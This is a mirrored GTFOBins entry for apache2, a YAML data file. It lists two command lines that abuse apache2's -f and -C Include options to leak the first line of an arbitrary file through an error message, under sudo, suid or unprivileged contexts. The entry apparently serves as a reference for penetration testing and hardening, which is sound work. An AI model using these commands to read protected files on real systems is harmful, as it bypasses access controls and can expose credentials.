1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/apache2
2026-01-20 17:20:32 +01:00

23 lines
467 B
Plaintext

---
functions:
file-read:
- binary: false
code: |-
apache2 -f /path/to/input-file
comment: |-
The first line may be leaked as an error message.
contexts:
sudo:
suid:
unprivileged:
- binary: false
code: |-
apache2 -C 'Define APACHE_RUN_DIR /' -C 'Include /path/to/input-file'
comment: |-
The first line may be leaked as an error message.
contexts:
sudo:
suid:
unprivileged:
...